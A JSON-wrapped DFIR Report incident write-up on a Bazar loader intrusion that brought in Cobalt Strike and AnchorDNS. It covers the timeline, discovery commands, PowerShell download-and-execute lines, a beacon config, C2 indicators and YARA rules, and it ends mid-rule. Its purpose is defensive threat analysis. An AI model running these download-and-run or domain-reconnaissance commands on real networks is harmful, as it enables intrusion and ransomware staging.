{ "id": "330d3778-1195-4cf2-b0cc-d6820b9de2c3", "created_at": "2026-04-06T00:21:34.074373Z", "updated_at": "2026-04-10T13:12:20.497368Z", "deleted_at": null, "sha1_hash": "2038a0eba536a55962c210b05d6ef146bd28ce28", "title": "Bazar Drops the Anchor", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1548830, "plain_text": "Bazar Drops the Anchor\r\nBy editor\r\nPublished: 2021-03-08 · Archived: 2026-04-05 17:11:05 UTC\r\nIntro\r\nThe malware identified as Anchor first entered the scene in late 2018 and has been linked to the same group as Trickbot, due\r\nto similarities in code and usage of the two different malware families in the same intrusions. In 2020 the Bazar malware\r\nfamily entered and again many associated it with the same group behind Trickbot.\r\nIn an intrusion this past month we saw another link between the 3 families with a Bazar loader bringing in Anchor DNS to\r\nfacilitate a full domain compromise intrusion. Over a 5 day time frame the threat actors moved from a single endpoint to full\r\ndomain compromise, and while ransomware deployment was not seen in this intrusion the TTP’s used mirror what we would\r\nexpect from a big game ransomware crew.\r\nCase Summary\r\nIn this case we started with a DocuSign themed Excel maldoc. The excel file failed to bring down the payload but to follow\r\nthe infection chain we executed the follow on loader. Once Bazar was established the malware quickly injected into the\r\nWerfault process to avoid detection. As seen in many intrusions the malware then performed some initial discovery with\r\nbuilt-in Microsoft utilities such as Nltest.\r\nAbout an hour after initial execution, a Cobalt Strike beacon was loaded, followed shortly by Anchor. Shortly after Cobalt\r\nStrike and Anchor were running, the attackers dumped credentials and began moving laterally, starting with a domain\r\ncontroller.\r\nOnce on the domain controller, the threat actors ran additional discovery but then went quiet. Active command and control\r\nwas maintained by all three malware samples (Bazar, Cobalt Strike, Anchor DNS) over the next 4 days.\r\nDuring that timeframe, honey documents were interacted with and additional discovery scans were executed. The threat\r\nactors were briefly active on day 3 to execute their Get-DataInfo script to collect additional information, which is usually\r\nfollowed closely by Ryuk ransomware.\r\nHowever, on the fifth day the threat actors access was cut off before final objectives could be accomplished. We assess that\r\nthe end goal of this intrusion was to execute domain wide ransomware.\r\nTimeline\r\nhttps://thedfirreport.com/2021/03/08/bazar-drops-the-anchor\r\nPage 1 of 19\n\nhttps://thedfirreport.com/2021/03/08/bazar-drops-the-anchor\r\nPage 2 of 19\n\nMITRE ATT\u0026CK\r\nInitial Access\r\nA DocuSign themed Excel xls was opened and macros were enabled. Thanks to @ffforward for the document as well as the\r\nsandbox run leading up to the xls file.\r\nThe macro in this maldoc is using Excel 4 Macros.\r\nDocuSign was again the social engineering format of choice.\r\nAfter execution, Excel called out to:\r\n https://morrislibraryconsulting[.]com/favicam/gertnm.php\r\nhttps://thedfirreport.com/2021/03/08/bazar-drops-the-anchor\r\nPage 3 of 19\n\nExecution\r\nWe saw no further follow on activity from the above execution, potentiality due to the loader site being offline or some other\r\ncondition not being met. We then executed the follow on malware manually.\r\nBazar Loader – 14wfa5dfs.exe\r\nAbout an hour after execution of the above Bazar Loader, Cobalt Strike was executed by the injected Werfault process.\r\nShortly after Cobalt Strike was executed, it dropped several Anchor executable files.\r\nhttps://thedfirreport.com/2021/03/08/bazar-drops-the-anchor\r\nPage 4 of 19\n\nAnchorDns was then executed via Cobalt Strike which called cmd and then anchorAsjuster. Notice Asjuster passing two\r\ndomains to anchor_x64.exe which will be used for C2.\r\nC:\\Windows\\system32\\cmd.exe /C C:\\Windows\\Temp\\adf\\anchorAsjuster_x64.exe --source=anchorDNS_x64.exe --target=\r\nDefense Evasion\r\nBazar quickly moved into a Werfault process to handle command and control communication avoiding making any network\r\nconnections directly.\r\nProcess injection was also seen in other key system executables such as winlogon.exe.\r\nCobalt Strike was seen locking access to SMB beacons.\r\nAnchor was also seen triggering process tampering.\r\nhttps://thedfirreport.com/2021/03/08/bazar-drops-the-anchor\r\nPage 5 of 19\n\nCredential Access\r\nThe threat actors were seen using remote thread creation to inject into lsass to extract credentials.\r\nThe same activity as seen via a the larger process tree.\r\nDiscovery\r\nBazar initiated some discovery activity within 10 minutes of executing.\r\nnet view /all\r\nnet view /all /domain\r\nnltest.exe /domain_trusts /all_trusts\r\nnet localgroup \"administrator\"\r\nnet group \"domain admins\" /domain\r\nsysteminfo\r\nwhoami\r\nreg query hklm\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall /v \"DisplayName\" /s\r\nreg query hklm\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall /v \"DisplayName\" /s\r\nhttps://thedfirreport.com/2021/03/08/bazar-drops-the-anchor\r\nPage 6 of 19\n\nreg query hkcu\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall /v \"DisplayName\" /s\r\nreg query hkcu\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall /v \"DisplayName\" /s\r\nCobalt Strike initiated the following discovery commands:\r\nnet group \\\"enterprise admins\\\" /domain\r\nnet group \\\"domain admins\\\" /domain\r\nsysteminfo\r\nOn the domain controller the following discovery was run:\r\nnltest /dclist:\"DOMAIN.EXAMPLE\r\nnltest /domain_trusts /all_trusts\r\nIEX (New-Object Net.Webclient).DownloadString('\"http://127.0.0.1:3672/'); Get-NetSubnet\r\nIEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:45082/'); Get-NetComputer -ping\r\nThe following PowerShell command was executed from the domain controller.\r\nDecoded:\r\nIEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:13773/'); Import-Module ActiveDirectory; Get-A\r\nSystems were pinged from the domain controller to confirm connectivity.\r\nC:\\Windows\\system32\\cmd.exe /C ping HOSTX\r\nFour days into the intrusion the threat actors dropped and executed Advanced_IP_Scanner_2.5.3850.exe which kicked off a\r\nscan of the network.\r\nAWS was used to get the public IP of the infected machine, multiple times.\r\nhttps://thedfirreport.com/2021/03/08/bazar-drops-the-anchor\r\nPage 7 of 19\n\ncheckip.amazonaws.com\r\nMinutes before deployment of Ryuk the threat actors usually drop the following files, usually on a domain controller. This\r\ntime they dropped the files on a domain controller in C:\\info\r\nThe exact files were mentioned in our Bazar, No Ryuk report.\r\nstart.bat was executed with the following:\r\nhttps://thedfirreport.com/2021/03/08/bazar-drops-the-anchor\r\nPage 8 of 19\n\nC:\\Windows\\system32\\cmd.exe /c \"\"C:\\info\\start.bat\"\"\r\nThis script contents show it to be a wrapper for the PowerShell script Get-DataInfo.ps1\r\nThe contents of Get-DataInfo.ps1 show a detailed information collector to provide the threat actor with very specific details\r\nof the environment. This includes things like disk size, connectivity,  antivirus software, and backup software. The Ryuk\r\ngroup has used this script for at least a year as we’ve seen them use it multiple times.\r\nThis script and files are available @ https://thedfirreport.com/services/\r\nLateral Movement\r\nTwo hours post initial access the threat actors began lateral movement to one of the domain controllers using PowerShell,\r\nwhich was executed via a remote service, which launched Cobalt Strike\r\nhttps://thedfirreport.com/2021/03/08/bazar-drops-the-anchor\r\nPage 9 of 19\n\nReviewing the PowerShell script we can extract the shellcode and run it through scdbg to find the pipe used by the beacon.\r\nThanks to 0xtornado and @mattnotmax for this recipe!\r\nThe threat actors also used SMB beacons executed by remote services as well. We saw this across most machines in the\r\ndomain.\r\nThe threat actors also used RDP to login to multiple machines within the domain.\r\nCollection\r\nWe did not witness collection events but we do believe files were collected and exfiltrated over encrypted C2 channels.\r\nCommand and Control\r\nBazar:\r\n34.210.71[.]206\r\nCertificate:[ec:c8:db:01:a4:a3:17:36:54:a2:f5:06:44:84:5c:f6:25:6e:4f:74 ]\r\nNot Before:2021/02/04 02:59:01\r\nNot After2022/02/04 02:59:01\r\nhttps://thedfirreport.com/2021/03/08/bazar-drops-the-anchor\r\nPage 10 of 19\n\nIssuer Org: Global Security\r\nSubject Common: example.com\r\nSubject Org: Global Security\r\nPublic Algorithm:rsaEncryption\r\nJA3: 51c64c77e60f3980eea90869b68c58a8\r\nJA3s: e35df3e00ca4ef31d42b34bebaa2f86e\r\nCertificate: [06:32:21:0b:8b:a2:a7:3c:47:a4:33:53:11:a3:11:08:59:48:31:e2 ]\r\nNot Before 2020/06/12 20:00:00\r\nNot After 2021/05/22 08:00:00\r\nIssuer Org: Amazon\r\nSubject Common: *.v.m2.uw2.app.chime.aws [*.v.m2.uw2.app.chime.aws ]\r\nPublic Algorithm: rsaEncryption\r\nJA3:fc54e0d16d9764783542f0146a98b300\r\nJA3s:9e4af711131ebfb2a0cff53c4f2d64e6\r\nWe observed the Bazar malware inject into a WerFault process to perform ongoing command and control communication.\r\nAnchor:\r\nThe AnchorDNS malware performed C2 over DNS to the following domains:\r\nxyskencevli.com\r\nhttps://thedfirreport.com/2021/03/08/bazar-drops-the-anchor\r\nPage 11 of 19\n\nsluaknhbsoe.com\r\nCobalt Strike:\r\n195.123.217[.]45\r\nJARM: 07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1\r\nCertificate: [3c:bb:96:de:a7:d7:7a:7d:61:10:7c:53:e3:d0:f5:70:43:54:61:2e ]\r\nNot Before: 2021/02/08 03:45:51\r\nNot After: 2021/05/09 04:45:51\r\nIssuer Org: Let's Encrypt\r\nSubject Common: gloomix.com [gloomix.com ,www.gloomix.com ]\r\nPublic Algorithm: rsaEncryption\r\nCobalt Strike Config:\r\n| grab_beacon_config:\r\n| x86 URI Response:\r\n| BeaconType: 0 (HTTP)\r\n| Port: 80\r\n| Polling: 45000\r\n| Jitter: 37\r\n| Maxdns: 255\r\n| C2 Server: 195.123.217.45,/jquery-3.3.1.min.js\r\n| User Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko\r\n| HTTP Method Path 2: /jquery-3.3.2.min.js\r\n| Header1:\r\n| Header2:\r\n| PipeName:\r\n| DNS Idle: J}\\xC4q\r\n| DNS Sleep: 0\r\n| Method1: GET\r\n| Method2: POST\r\n| Spawnto_x86: %windir%\\syswow64\\dllhost.exe\r\n| Spawnto_x64: %windir%\\sysnative\\dllhost.exe\r\n| Proxy_AccessType: 2 (Use IE settings)\r\n|\r\n|\r\n| x64 URI Response:\r\n| BeaconType: 0 (HTTP)\r\n| Port: 80\r\n| Polling: 45000\r\n| Jitter: 37\r\n| Maxdns: 255\r\n| C2 Server: 195.123.217.45,/jquery-3.3.1.min.js\r\n| User Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko\r\n| HTTP Method Path 2: /jquery-3.3.2.min.js\r\n| Header1:\r\nhttps://thedfirreport.com/2021/03/08/bazar-drops-the-anchor\r\nPage 12 of 19\n\n| Header2:\r\n| PipeName:\r\n| DNS Idle: J}\\xC4q\r\n| DNS Sleep: 0\r\n| Method1: GET\r\n| Method2: POST\r\n| Spawnto_x86: %windir%\\syswow64\\dllhost.exe\r\n| Spawnto_x64: %windir%\\sysnative\\dllhost.exe\r\n| Proxy_AccessType: 2 (Use IE settings)\r\n|_\r\n443/tcp open https\r\n| grab_beacon_config:\r\n| x86 URI Response:\r\n| BeaconType: 8 (HTTPS)\r\n| Port: 443\r\n| Polling: 45000\r\n| Jitter: 37\r\n| Maxdns: 255\r\n| C2 Server: gloomix.com,/jquery-3.3.1.min.js\r\n| User Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko\r\n| HTTP Method Path 2: /jquery-3.3.2.min.js\r\n| Header1:\r\n| Header2:\r\n| PipeName:\r\n| DNS Idle: J}\\xC4q\r\n| DNS Sleep: 0\r\n| Method1: GET\r\n| Method2: POST\r\n| Spawnto_x86: %windir%\\syswow64\\dllhost.exe\r\n| Spawnto_x64: %windir%\\sysnative\\dllhost.exe\r\n| Proxy_AccessType: 2 (Use IE settings)\r\n|\r\n|\r\n| x64 URI Response:\r\n| BeaconType: 8 (HTTPS)\r\n| Port: 443\r\n| Polling: 45000\r\n| Jitter: 37\r\n| Maxdns: 255\r\n| C2 Server: gloomix.com,/jquery-3.3.1.min.js\r\n| User Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko\r\n| HTTP Method Path 2: /jquery-3.3.2.min.js\r\n| Header1:\r\n| Header2:\r\n| PipeName:\r\n| DNS Idle: J}\\xC4q\r\n| DNS Sleep: 0\r\n| Method1: GET\r\n| Method2: POST\r\n| Spawnto_x86: %windir%\\syswow64\\dllhost.exe\r\n| Spawnto_x64: %windir%\\sysnative\\dllhost.exe\r\n| Proxy_AccessType: 2 (Use IE settings)\r\n|_\r\n~tmp01925d3f.exe can be seen communicating with the Cobalt Strike C2 channel.\r\nhttps://thedfirreport.com/2021/03/08/bazar-drops-the-anchor\r\nPage 13 of 19\n\nExfiltration\r\nNo exfiltration was observed but honey docs were taken off network and opened by the threat actors from remote locations.\r\nWe assess that this exfiltration was performed over an encrypted C2 channel. This exfiltration has been going on for months\r\nand is rarely talked about when it comes to Wizard Spider.\r\nImpact\r\nWe believe this intrusion would have ended with domain wide ransomware. The deployment of the Get-DataInfo.ps1 script\r\nand overall TTP’s used in the intrustion are consistent with threat actors associated with deployments of the Ryuk\r\nransomware family.\r\nEnjoy our report? Please consider donating $1 or more using Patreon. Thank you for your support!\r\nWe also have pcaps, memory captures, scripts, executables, and Kape packages available here\r\nIOCs\r\nIf you would like access to our internal MISP and/or threat feeds please see here.\r\nNetwork\r\n54.176.158.165\r\n54.193.234.163\r\n54.241.149.90\r\nhttps://thedfirreport.com/2021/03/08/bazar-drops-the-anchor\r\nPage 14 of 19\n\n208.100.26.238\r\n63.251.235.71\r\n34.210.71.206\r\n195.123.217.45\r\ngloomix.com\r\nhttps://morrislibraryconsulting.com/favicam/gertnm.php\r\nxyskencevli.com\r\nsluaknhbsoe.com\r\nFile\r\nrequest_form_1612805504.xls\r\n58eaac6124749d0e93df6d05a4380c22\r\n7e14c560484cb7e8ae065224a7d4978b9939ef9a\r\nd9b13ef49c80375e0a8cf20b840b1e8283b35c1a1a6adcbb4173eb25490530e0\r\n~tmp01925d3f.exe\r\nef7047a0ca52ef7f4d20281b50207f71\r\n61d8f56452fd9df5952fac84f10ea8520ed5958c\r\n10ff83629d727df428af1f57c524e1eaddeefd608c5a317a5bfc13e2df87fb63\r\nanchorAsjuster_x64.exe\r\n9fbc3d560d075f33a15aa67ae74ac6ef\r\na298c6f5f8902fb581a1b5b922f95b362747f9a7\r\n3ab8a1ee10bd1b720e1c8a8795e78cdc09fec73a6bb91526c0ccd2dc2cfbc28d\r\nanchorDNS_x64.exe\r\n7160ac4abb26f0ca4c1b6dfba44f8d36\r\n3820ff0d04a233745c79932b77eccfe743a81d34\r\n9fdbd76141ec43b6867f091a2dca503edb2a85e4b98a4500611f5fe484109513\r\nanchor_x64.exe\r\n0be407690fd049ea640dfc64a80c7b2a\r\nc9c4ef9b8b39c584d554de8afeb2be6f5648aa6d\r\nca72600f50c76029b6fb71f65423afc44e4e2d93257c3f95fb994adc602f3e1b\r\n14wfa5dfs.exe\r\n9a16a348d3f4e7da3e8746667624115f\r\nbebdec590d2a2fffaecb970b73e3067294c9125b\r\n2065157b834e1116abdd5d67167c77c6348361e04a8085aa382909500f1bbe69\r\nextracted-cobalt-strike-beacon.exe\r\n49dc44dfa14a76e139bf5efb4a78aca6\r\na47fc79bc1f0da5d292a986acdbe9057d3dd15c9\r\n738018c61a8db247615c9a3290c26fbbc4e230d5fbe00c4312401b90813c340c\r\nPDB paths\r\nanchordns_x64.exe - z:\\d\\git\\anchordns.llvm\\bin\\x64\\release\\anchordns_x64.pdb\r\nanchor_x64.exe - z:\\d\\git\\anchordns.llvm\\bin\\x64\\release\\anchordns_x64.pdb\r\n~tmp01925d3f.exe - c:\\users\\hillary\\source\\repos\\gromyko\\release\\gromyko.pdb\r\nAccessed Honey Docs\r\nIP: 23.94.51[.]80\r\nUA: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CL\r\nDetections\r\nNetwork\r\nET INFO Observed DNS Query for EmerDNS TLD (.bazar)\r\nETPRO POLICY External IP Check (checkip.amazonaws.com)\r\nETPRO TROJAN Win32/TrickBot Anchor Variant Style External IP Check\r\nET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection\r\nET SCAN Behavioral Unusual Port 139 traffic Potential Scan or Infection\r\nET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)\r\nhttps://thedfirreport.com/2021/03/08/bazar-drops-the-anchor\r\nPage 15 of 19\n\nETPRO POLICY Possibly Suspicious example.com SSL Cert\r\nET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)\r\nSigma\r\nhttps://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_susp_powershell_enc_cmd.yml\r\nhttps://github.com/Neo23x0/sigma/blob/084cd39505861188d9d8f2d5c0f2835e4f750a3f/rules/windows/process_creation/win_malware_trickbot_r\r\nhttps://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_susp_commands_recon_activity.yml\r\nhttps://github.com/Neo23x0/sigma/blob/c56cd2dfff6343f3694ef4fd606a305415599737/rules/network/net_dns_c2_detection.yml\r\nYara\r\n/*\r\nYARA Rule Set\r\nAuthor: The DFIR Report\r\nDate: 2021-02-22\r\nIdentifier: 1017 Anchoring Bazar\r\nReference: https://thedfirreport.com/\r\n*/\r\n/* Rule Set ----------------------------------------------------------------- */\r\nimport \"pe\"\r\nrule bazar_14wfa5dfs {\r\nmeta:\r\ndescription = \"files - file 14wfa5dfs.exe\"\r\nauthor = \"The DFIR Report\"\r\nreference = \"https://thedfirreport.com/\"\r\ndate = \"2021-02-22\"\r\nhash1 = \"2065157b834e1116abdd5d67167c77c6348361e04a8085aa382909500f1bbe69\"\r\nstrings:\r\n$s1 = \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n$s2 = \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n$s3 = \"AppPolicyGetProcessTerminationMethod\" fullword ascii\r\n$s4 = \"0??dfg.dll ASHI128 bit 98tqewC58752F9578\" fullword ascii\r\n$s5 = \"*http://crl4.digicert.com/assured-cs-g1.crl0L\" fullword ascii\r\n$s6 = \"*http://crl3.digicert.com/assured-cs-g1.crl00\" fullword ascii\r\n$s7 = \"/http://crl4.digicert.com/sha2-assured-cs-g1.crl0L\" fullword ascii\r\n$s8 = \"appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}\u0026iid={F61A86A8-0045-3726-D207-E8A923987AD2}\u0026lang=ru\u0026brows\r\n$s9 = \"operator co_await\" fullword ascii\r\n$s10 = \"appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}\u0026iid={F61A86A8-0045-3726-D207-E8A923987AD2}\u0026lang=ru\u0026brow\r\n$s11 = \"api-ms-win-appmodel-runtime-l1-1-2\" fullword wide\r\n$s12 = \"Google LLC1\" fullword ascii\r\n$s13 = \"Google LLC0\" fullword ascii\r\n$s14 = \"Unknown issuer0\" fullword ascii\r\n$s15 = \"DigiCert, Inc.1$0\\\"\" fullword ascii\r\n$s16 = \"=Google%20Chrome\u0026needsadmin=prefers\u0026ap=x64-stable-statsdef_1\u0026installdataindex=empty\" fullword ascii\r\n$s17 = \"TIMESTAMP-SHA256-2019-10-150\" fullword ascii\r\n$s18 = \"vggwqrwqr7d6\" fullword ascii\r\n$s19 = \"api-ms-win-core-file-l1-2-2\" fullword wide /* Goodware String - occured 1 times */\r\n$s20 = \"__swift_2\" fullword ascii\r\ncondition:\r\nuint16(0) == 0x5a4d and filesize \u003c 3000KB and\r\n( pe.imphash() == \"d8af53b239700b702d462c81a96d396c\" or 8 of them )\r\n}\r\nrule cobalt_strike_tmp01925d3f {\r\nmeta:\r\ndescription = \"files - file ~tmp01925d3f.exe\"\r\nauthor = \"The DFIR Report\"\r\nreference = \"https://thedfirreport.com/\"\r\ndate = \"2021-02-22\"\r\nhttps://thedfirreport.com/2021/03/08/bazar-drops-the-anchor\r\nPage 16 of 19\n\nhash1 = \"10ff83629d727df428af1f57c524e1eaddeefd608c5a317a5bfc13e2df87fb63\"\nstrings:\n$x1 = \"C:\\\\Users\\\\hillary\\\\source\\\\repos\\\\gromyko\\\\Release\\\\gromyko.pdb\" fullword ascii\n$x2 = \"api-ms-win-core-synch-l1-2-0.dll\" fullword wide /* reversed goodware string 'lld.0-2-1l-hcnys-eroc-niw-\n$s3 = \"gromyko32.dll\" fullword ascii\n$s4 = \"\" fullword ascii\n$s5 = \"AppPolicyGetProcessTerminationMethod\" fullword ascii\n$s6 = \"https://sectigo.com/CPS0\" fullword ascii\n$s7 = \"2http://crl.comodoca.com/AAACertificateServices.crl04\" fullword ascii\n$s8 = \"?http://crl.usertrust.com/USERTrustRSACertificationAuthority.crl0v\" fullword ascii\n$s9 = \"3http://crt.usertrust.com/USERTrustRSAAddTrustCA.crt0%\" fullword ascii\n$s10 = \"http://ocsp.sectigo.com0\" fullword ascii\n$s11 = \"2http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s\" fullword ascii\n$s12 = \"2http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#\" fullword ascii\n$s13 = \"http://www.digicert.com/CPS0\" fullword ascii\n$s14 = \"AppPolicyGetThreadInitializationType\" fullword ascii\n$s15 = \"alerajner@aol.com0\" fullword ascii\n$s16 = \"gromyko.inf\" fullword ascii\n$s17 = \"operator\u003c=\u003e\" fullword ascii\n$s18 = \"operator co_await\" fullword ascii\n$s19 = \"gromyko\" fullword ascii\n$s20 = \"api-ms-win-appmodel-runtime-l1-1-2\" fullword wide\ncondition:\nuint16(0) == 0x5a4d and filesize \u003c 1000KB and\n( pe.imphash() == \"1b1b73382580c4be6fa24e8297e1849d\" or ( 1 of ($x*) or 4 of them ) )\n}\nrule advanced_ip_scanner {\nmeta:\ndescription = \"files - file advanced_ip_scanner.exe\"\nauthor = \"The DFIR Report\"\nreference = \"https://thedfirreport.com/\"\ndate = \"2021-02-22\"\nhash1 = \"722fff8f38197d1449df500ae31a95bb34a6ddaba56834b13eaaff2b0f9f1c8b\"\nstrings:\n$x1 = \"www.radmin.com\" fullword wide\ncondition:\nuint16(0) == 0x5a4d and filesize \u003c 5000KB and\n( pe.imphash() == \"a3bc8eb6ac4320e91b7faf1e81af2bbf\" or ( 1 of ($x*) or 4 of them ) )\n}\nrule anchor_x64 {\nmeta:\ndescription = \"files - file anchor_x64.exe\"\nauthor = \"The DFIR Report\"\nreference = \"https://thedfirreport.com/\"\ndate = \"2021-02-22\"\nhttps://thedfirreport.com/2021/03/08/bazar-drops-the-anchor\nPage 17 of 19\n\nhash1 = \"ca72600f50c76029b6fb71f65423afc44e4e2d93257c3f95fb994adc602f3e1b\"\r\nstrings:\r\n$x1 = \"cmd.exe /c timeout 3 \u0026\u0026 \" fullword wide\r\n$x2 = \"\u003cassembly xmlns=\\\"urn:schemas-microsoft-com:asm.v1\\\" manifestVersion=\\\"1.0\\\"\u003e\u003ctrustInfo\u003e\u003csecurity\u003e\u003crequ\r\n$x3 = \"api-ms-win-core-synch-l1-2-0.dll\" fullword wide /* reversed goodware string 'lld.0-2-1l-hcnys-eroc-niw-\r\n$s4 = \"\\\\System32\\\\cmd.ex\\\\System32\\\\rundllP\" fullword ascii\r\n$s5 = \"Z:\\\\D\\\\GIT\\\\anchorDns.llvm\\\\Bin\\\\x64\\\\Release\\\\anchorDNS_x64.pdb\" fullword ascii\r\n$s6 = \"AppPolicyGetProcessTerminationMethod\" fullword ascii\r\n$s7 = \"cutionLevel level=\\\"asInvoker\\\" uiAccess=\\\"false\\\"\u003e\u003c/requestedExecutionLevel\u003e\u003c/requestedPrivileges\u003e\u003c/se\r\n$s8 = \"thExecute\" fullword ascii\r\n$s9 = \"on xmlns=\\\"urn:schemas-microsoft-com:asm.v3\\\"\u003e\u003cwindowsSettings\u003e\u003cdpiAware xmlns=\\\"http://schemas.microso\r\n$s10 = \"WinHTTP loader/1.0\" fullword wide\r\n$s11 = \"AppPolicyGetThreadInitializationType\" fullword ascii\r\n$s12 = \"AnchorDNS.cpp\" fullword ascii\r\n$s13 = \"hardWorker.cpp\" fullword ascii\r\n$s14 = \"operator\u003c=\u003e\" fullword ascii\r\n$s15 = \"operator co_await\" fullword ascii\r\n$s16 = \"/C PowerShell \\\"Start-Slemove-Iteep 3; Re\" fullword wide\r\n$s17 = \"\u003cassembly xmlns=\\\"urn:schemas-microsoft-com:asm.v1\\\" manifestVersion=\\\"1.0\\\"\u003e\u003ctrustInfo\u003e\u003csecurity\u003e\u003creq\r\n$s18 = \"api-ms-win-appmodel-runtime-l1-1-2\" fullword wide\r\n$s19 = \"UAWAVAUATVWSH\" fullword ascii\r\n$s20 = \"AWAVAUATVWUSH\" fullword ascii\r\ncondition:\r\nuint16(0) == 0x5a4d and filesize \u003c 1000KB and\r\n( pe.imphash() == \"e2450fb3cc5b1b7305e3193fe03f3369\" or ( 1 of ($x*) or 4 of them ) )\r\n}\r\nrule anchorDNS_x64 {\r\nmeta:\r\ndescription = \"files - file anchorDNS_x64.exe\"\r\nauthor = \"The DFIR Report\"\r\nreference = \"https://thedfirreport.com/\"\r\ndate = \"2021-02-22\"\r\nhash1 = \"9fdbd76141ec43b6867f091a2dca503edb2a85e4b98a4500611f5fe484109513\"\r\nstrings:\r\n$x1 = \"cmd.exe /c timeout 3 \u0026\u0026 \" fullword wide\r\n$x2 = \"\u003cassembly xmlns=\\\"urn:schemas-microsoft-com:asm.v1\\\" manifestVersion=\\\"1.0\\\"\u003e\u003ctrustInfo\u003e\u003csecurity\u003e\u003crequ\r\n$x3 = \"api-ms-win-core-synch-l1-2-0.dll\" fullword wide /* reversed goodware string 'lld.0-2-1l-hcnys-eroc-niw-\r\n$s4 = \"\\\\System32\\\\cmd.ex\\\\System32\\\\rundllP\" fullword ascii\r\n$s5 = \"Z:\\\\D\\\\GIT\\\\anchorDns.llvm\\\\Bin\\\\x64\\\\Release\\\\anchorDNS_x64.pdb\" fullword ascii\r\n$s6 = \"AppPolicyGetProcessTerminationMethod\" fullword ascii\r\n$s7 = \"cutionLevel level=\\\"asInvoker\\\" uiAccess=\\\"false\\\"\u003e\u003c/requestedExecutionLevel\u003e\u003c/requestedPrivileges\u003e\u003c/se\r\n$s8 = \"thExecute\" fullword ascii\r\n$s9 = \"on xmlns=\\\"urn:schemas-microsoft-com:asm.v3\\\"\u003e\u003cwindowsSettings\u003e\u003cdpiAware xmlns=\\\"http://schemas.microso\r\n$s10 = \"WinHTTP loader/1.0\" fullword wide\r\n$s11 = \"AppPolicyGetThreadInitializationType\" fullword ascii\r\n$s12 = \"AnchorDNS.cpp\" fullword ascii\r\n$s13 = \"hardWorker.cpp\" fullword ascii\r\n$s14 = \"operator\u003c=\u003e\" fullword ascii\r\n$s15 = \"operator co_await\" fullword ascii\r\n$s16 = \"/C PowerShell \\\"Start-Slemove-Iteep 3; Re\" fullword wide\r\n$s17 = \"\u003cassembly xmlns=\\\"urn:schemas-microsoft-com:asm.v1\\\" manifestVersion=\\\"1.0\\\"\u003e\u003ctrustInfo\u003e\u003csecurity\u003e\u003creq\r\n$s18 = \"api-ms-win-appmodel-runtime-l1-1-2\" fullword wide\r\n$s19 = \"UAWAVAUATVWSH\" fullword ascii\r\n$s20 = \"AWAVAUATVWUSH\" fullword ascii\r\ncondition:\r\nuint16(0) == 0x5a4d and filesize \u003c 1000KB and\r\n( pe.imphash() == \"e2450fb3cc5b1b7305e3193fe03f3369\" or ( 1 of ($x*) or 4 of them ) )\r\n}\r\nrule anchorAsjuster_x64 {\r\nmeta:\r\ndescription = \"files - file anchorAsjuster_x64.exe\"\r\nauthor = \"The DFIR Report\"\r\nreference = \"https://thedfirreport.com/\"\r\ndate = \"2021-02-22\"\r\nhttps://thedfirreport.com/2021/03/08/bazar-drops-the-anchor\r\nPage 18 of 19\n\nhash1 = \"3ab8a1ee10bd1b720e1c8a8795e78cdc09fec73a6bb91526c0ccd2dc2cfbc28d\"\r\nstrings:\r\n$s1 = \"curity\u003e\u003crequestedPrivileges\u003e\u003crequestedExecutionLevel level=\\\"asInvoker\\\" uiAccess=\\\"false\\\"\u003e\u003c/requested\r\n$s2 = \"anchorAdjuster* --source=\u003csource file\u003e --target=\u003ctarget file\u003e --domain=\u003cdomain name\u003e --period=\u003crecurren\r\n$s3 = \"anchorAdjuster* --source=\u003csource file\u003e --target=\u003ctarget file\u003e --domain=\u003cdomain name\u003e --period=\u003crecurren\r\n$s4 = \"target file \\\"%s\\\"\" fullword ascii\r\n$s5 = \"--target=\" fullword ascii\r\n$s6 = \"hemas.microsoft.com/SMI/2005/WindowsSettings\\\"\u003etrue\u003c/dpiAware\u003e\u003c/windowsSettings\u003e\u003c/application\u003e\u003c/assembl\r\n$s7 = \"error write file, written %i bytes, need write %i bytes, error code %i\" fullword ascii\r\n$s8 = \"error create file \\\"%s\\\", code %i\" fullword ascii\r\n$s9 = \"guid: %s, shift 0x%08X(%i)\" fullword ascii\r\n$s10 = \"ault value 15\u003e -guid --count=\u003ccount of instances\u003e\" fullword ascii\r\n$s11 = \"domain: shift 0x%08X(%i)\" fullword ascii\r\n$s12 = \"\u003cassembly xmlns=\\\"urn:schemas-microsoft-com:asm.v1\\\" manifestVersion=\\\"1.0\\\"\u003e\u003ctrustInfo xmlns=\\\"urn:sc\r\n$s13 = \"vileges\u003e\u003c/security\u003e\u003c/trustInfo\u003e\u003capplication 